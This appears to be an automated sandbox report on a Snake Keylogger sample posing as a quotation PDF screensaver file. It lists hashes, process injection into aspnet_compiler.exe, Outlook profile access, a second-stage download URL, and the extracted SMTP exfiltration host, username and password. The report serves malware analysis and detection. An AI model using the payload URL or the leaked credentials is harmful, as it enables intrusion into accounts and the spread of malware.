Analysis

  • max time kernel
    121s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/11/2024, 02:07 UTC

General

  • Target

    QUOTATION_NOVQTRA071244PDF.scr

  • Size

    170KB

  • MD5

    d2f5552955ff07429b7218f4a4008cfc

  • SHA1

    56b59a77d25773d341aec87d268db3cde8649ea5

  • SHA256

    8f2049d7defe36c3970dc16ba924cc268cac0f9474ff5aca8d692d2b2b961726

  • SHA512

    94e14f03d068d8b3e9208aab419d86077524e0c1dc2fab924951aa1f26738fc1b470940056f1ca15acbf65028a1ccf43c0cadc7a538f2597c88eb32c173f4a6c

  • SSDEEP

    3072:EP95ONHGTxjx6CHj1GVUyZbdB8Ky48H95rnyPDtq4/tSpWA7HpguwC6gUd5:El5OexPjVFnSL1S4AzpguwC2

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    gator3220.hostgator.com
  • Port:
    587
  • Username:
    abbsend@qlststv.com
  • Password:
    G!!HFpD@N*]*nF

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\QUOTATION_NOVQTRA071244PDF.scr
    "C:\Users\Admin\AppData\Local\Temp\QUOTATION_NOVQTRA071244PDF.scr" /S
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:4856

Network

  • flag-us
    DNS
    filetransfer.io
    QUOTATION_NOVQTRA071244PDF.scr
    Remote address:
    8.8.8.8:53
    Request
    filetransfer.io
    IN A
    Response
    filetransfer.io
    IN A
    104.21.13.139
    filetransfer.io
    IN A
    172.67.200.96
  • flag-us
    GET
    http://filetransfer.io/data-package/O7tfWEfj/download
    QUOTATION_NOVQTRA071244PDF.scr
    Remote address:
    104.21.13.139:80
    Request
    GET /data-package/O7tfWEfj/download HTTP/1.1
    Host: filetransfer.io
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 07 Nov 2024 02:07:11 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://filetransfer.io/data-package/O7tfWEfj/download
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ALp%2BTRDoysbQlPTWaCUCPrQSn0%2BAwkgW03yqhD94ZhySdky082BhFpncOUljXKuHXobMkV2GIgRBDL4wKdpmgLs%2BlDmJXixAcxA%2B4SRAXC8SwZ3vHouZxfs24PbFYlSpjo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c4acfaad7792-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=41357&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    GET
    https://filetransfer.io/data-package/O7tfWEfj/download
    QUOTATION_NOVQTRA071244PDF.scr
    Remote address:
    104.21.13.139:443
    Request
    GET /data-package/O7tfWEfj/download HTTP/1.1
    Host: filetransfer.io
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Date: Thu, 07 Nov 2024 02:07:11 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: Nette Framework 3
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
    Set-Cookie: PHPSESSID=crd798p0n2966df73q7jjendul; expires=Thu, 21-Nov-2024 02:07:11 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Vary: X-Requested-With
    Location: https://s23.filetransfer.io/storage/download/FkXcFOVglHQY
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4sXyp8FS568wRcy0AQsz6D1hURFjOnki4W3QUWH7%2FrZtVkSHRKzV3R%2B9qBg2xjgeIOFUR387E3ZZympXfHSjZIdBprc%2B6kD1ZaJXJQBWHDGVyXA%2BEWj2%2FSpumKSbP1Ef8E%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c4b00edf636b-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=45519&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=386&delivery_rate=82030&cwnd=253&unsent_bytes=0&cid=b3d4a342408eccad&ts=511&x=0"
  • flag-us
    DNS
    s23.filetransfer.io
    QUOTATION_NOVQTRA071244PDF.scr
    Remote address:
    8.8.8.8:53
    Request
    s23.filetransfer.io
    IN A
    Response
    s23.filetransfer.io
    IN A
    104.21.13.139
    s23.filetransfer.io
    IN A
    172.67.200.96
  • flag-us
    GET
    https://s23.filetransfer.io/storage/download/FkXcFOVglHQY
    QUOTATION_NOVQTRA071244PDF.scr
    Remote address:
    104.21.13.139:443
    Request
    GET /storage/download/FkXcFOVglHQY HTTP/1.1
    Host: s23.filetransfer.io
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:07:12 GMT
    Content-Type: application/octet-stream
    Content-Length: 1055760
    Connection: keep-alive
    Last-Modified: Tue, 05 Nov 2024 06:04:29 GMT
    Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
    Set-Cookie: PHPSESSID=f9dbd35021604e949ecd61896fc89fd0; expires=Thu, 21-Nov-2024 02:07:12 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Disposition: attachment; filename="Tjoffxfooo.wav"
    Accept-Ranges: bytes
    Accept-Ranges: bytes
    ETag: "6729b56d-101c10"
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ub7cp%2FmqtXSKOHvIk70R02nzl0DFpzbUd7VV%2BxZZPx%2FYsA8ZhPsTsHbpStm8ekDoPIn9aQ79PYKcfjXgqM4RGe4RnhHa%2B7izRLAvdL6KrOTkna2Q9SbB6ZxK30eYaHmSkT2XAm6X"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c4b40da163c9-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=43255&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=390&delivery_rate=83998&cwnd=253&unsent_bytes=0&cid=05a694d2c2386a3a&ts=334&x=0"
  • flag-us
    DNS
    checkip.dyndns.org
    aspnet_compiler.exe
    Remote address:
    8.8.8.8:53
    Request
    checkip.dyndns.org
    IN A
    Response
    checkip.dyndns.org
    IN CNAME
    checkip.dyndns.com
    checkip.dyndns.com
    IN A
    193.122.6.168
    checkip.dyndns.com
    IN A
    158.101.44.242
    checkip.dyndns.com
    IN A
    193.122.130.0
    checkip.dyndns.com
    IN A
    132.226.8.169
    checkip.dyndns.com
    IN A
    132.226.247.73
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:04 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 20357be2d13af1e2f81a034c4eab7172
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:07 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b7ec9a20e7deaa13cbff744ad9534a6f
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:13 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 96dfc23e280b462ad972c14d2a2eca09
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:15 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 24baa71a064586e028b5ec859570a1f8
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:18 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 15e7b325c661d52c2e317ca596dad1c4
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:21 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d93c6fb8109236a2ba5bf2adcddbe292
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:23 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 66f2cb0772f7672f2b8b2b2cac8f266d
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:26 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: c0067e00710db5ad0384805d0f03b4f6
  • flag-de
    GET
    http://checkip.dyndns.org/
    aspnet_compiler.exe
    Remote address:
    193.122.6.168:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:29 GMT
    Content-Type: text/html
    Content-Length: 105
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 963635e78c0251a84023692690b57e3d
  • flag-us
    DNS
    reallyfreegeoip.org
    aspnet_compiler.exe
    Remote address:
    8.8.8.8:53
    Request
    reallyfreegeoip.org
    IN A
    Response
    reallyfreegeoip.org
    IN A
    104.21.67.152
    reallyfreegeoip.org
    IN A
    172.67.177.134
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:10 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370840
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yq4XpUDj6zW2re2we3R4QwBnjKKthV33LH6JogreBBL9mr26FcmuGyzWEaePm714dmowTI99Bm6Xkfu3yKkNEHzqdrjjvDBmqMb6jdJrCjHlM3%2FuBhCAjavh2tWUZx2bJ%2BYGTBIu"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c6212ebf52c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=44347&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=374&delivery_rate=89776&cwnd=253&unsent_bytes=0&cid=f17cebc95ea4c008&ts=119&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:13 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370843
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aTDr76isQE9iOOQfAmdMHNhgVRlfdJJj2mFN5tNhCGDc%2FqMDhrpRTlo%2FqaVXn0uvUUIdAifIlJPCbwx2sQKlGptnM4HR7K6jfByzfatQfbW2U7mXnbIB4e04W3jHZ2bJYnK7fQko"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c6321d9752c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=43987&sent=9&recv=10&lost=0&retrans=1&sent_bytes=4753&recv_bytes=475&delivery_rate=4397&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=2827&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:15 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370845
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yrcfTYQElTpxJr%2BL345x1Ad%2BhWQxmQekT4BkL5dcytLF8Icw7%2FoNTGb8GcSWIbk4oGXtutyM%2FQ98SDaUNT3K4XxiQDc6mcOoCxoSQLRTHDRConzPVdn2nvGXZMEXrWifjPe%2FEJB8"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c6430bc252c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=69419&sent=12&recv=13&lost=0&retrans=1&sent_bytes=6395&recv_bytes=576&delivery_rate=66112&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=5543&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:18 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370848
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3%2B%2BZoRp6jXgLRVZ6ojgIcRcYvv4GeQNgyOAFf%2BC17Fom%2F9PSLhu6emdgSjKcShoIFNTTdaMo5E4gI%2BaMDdVa%2BwRCF%2BKu%2Fy7pXtEqVlEHAmLO%2BNtcMUSzSfWIBY6Jzdg2gDtsaES"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c6540ab952c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=88748&sent=15&recv=16&lost=0&retrans=1&sent_bytes=8037&recv_bytes=677&delivery_rate=66112&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=8256&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:21 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370851
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ne4%2FYKqngqXKeUI5kFEUC8ZCp30sE0IoiFBkUvqu%2BFznzNNaXNleWKAok%2FC5kzJDNbj90o2MH6VlijrijsRKXHG7mnmZ%2B31DFiHApPZ7r3Q4R9z9cY08B6fWe4HPohwPGALWw4yR"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c664fa4852c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=103568&sent=18&recv=19&lost=0&retrans=1&sent_bytes=9695&recv_bytes=778&delivery_rate=66112&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=10970&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:24 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370854
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIoRKS%2BXqGlkMIZJE4gUAviXznm%2F3cxl%2BCCSthbrJ7valu3YCgK67Dbd9Lbd9uoP08ndOQ9NYaQJU%2F2jNJLW2pjm1VG90u8KyG4yKuBdShczLi17sIPOSyo7CvYTq6S%2FvXdJ%2BLWq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c675e9ee52c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=115130&sent=21&recv=22&lost=0&retrans=1&sent_bytes=11337&recv_bytes=879&delivery_rate=66112&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=13692&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:26 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370856
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRsInD20e8%2Fm91AMUru7%2BS7Qhsggs012dWAQnXQ%2BfS7e0kCHuW%2Brz1HnfT%2Bc3%2FRcQdPeWxjvBRRAapgwLA8GYYc69lIfGvcZaBE%2Bpwd%2BI5NYQW8sK27qE2%2B7aZCDrnfX7x2211m%2F"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c686e93e52c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=122907&sent=24&recv=25&lost=0&retrans=1&sent_bytes=12995&recv_bytes=980&delivery_rate=66112&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=16400&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/138.199.29.44
    aspnet_compiler.exe
    Remote address:
    104.21.67.152:443
    Request
    GET /xml/138.199.29.44 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Nov 2024 02:08:29 GMT
    Content-Type: text/xml
    Content-Length: 355
    Connection: keep-alive
    x-amzn-requestid: c54d806c-7605-448e-80e2-6c5b4ba1b222
    x-amzn-trace-id: Root=1-67267872-3f046eed4af0d7872d2af9fc;Parent=5d4ccd5213ddb57b;Sampled=0;Lineage=1:fc9e8231:0
    x-cache: Miss from cloudfront
    via: 1.1 06b0ae3f7e31c86dd483b6af7dc0cc98.cloudfront.net (CloudFront)
    x-amz-cf-pop: LHR50-P7
    x-amz-cf-id: vmGpTMjh2U9YM4dibCuMaq8D7e4Ik8lBQYv4IPqsjxVb1ki0W-5QVA==
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 370859
    Last-Modified: Sat, 02 Nov 2024 19:07:30 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzTJj6Uybz%2BE%2B4tBNfYJwXS9cVG%2Bhh%2BRhAPE2FtxlX429kPa%2FfcHB6V%2Bf7sBGL4fws4U3rlgHEPYoMLqLeeLaj%2BD5X9%2FvNSxSU3DIBzhxMKk7wMu1Ps%2BjC5CSkhACXlXYj2C3jwe"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de9c697d9a252c0-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=129739&sent=27&recv=28&lost=0&retrans=1&sent_bytes=14653&recv_bytes=1081&delivery_rate=66112&cwnd=256&unsent_bytes=0&cid=f17cebc95ea4c008&ts=19117&x=0"
  • 104.21.13.139:80
    http://filetransfer.io/data-package/O7tfWEfj/download
    http
    QUOTATION_NOVQTRA071244PDF.scr
    325 B
    1.2kB
    5
    4

    HTTP Request

    GET http://filetransfer.io/data-package/O7tfWEfj/download

    HTTP Response

    301
  • 104.21.13.139:443
    https://filetransfer.io/data-package/O7tfWEfj/download
    tls, http
    QUOTATION_NOVQTRA071244PDF.scr
    788 B
    4.8kB
    9
    10

    HTTP Request

    GET https://filetransfer.io/data-package/O7tfWEfj/download

    HTTP Response

    302
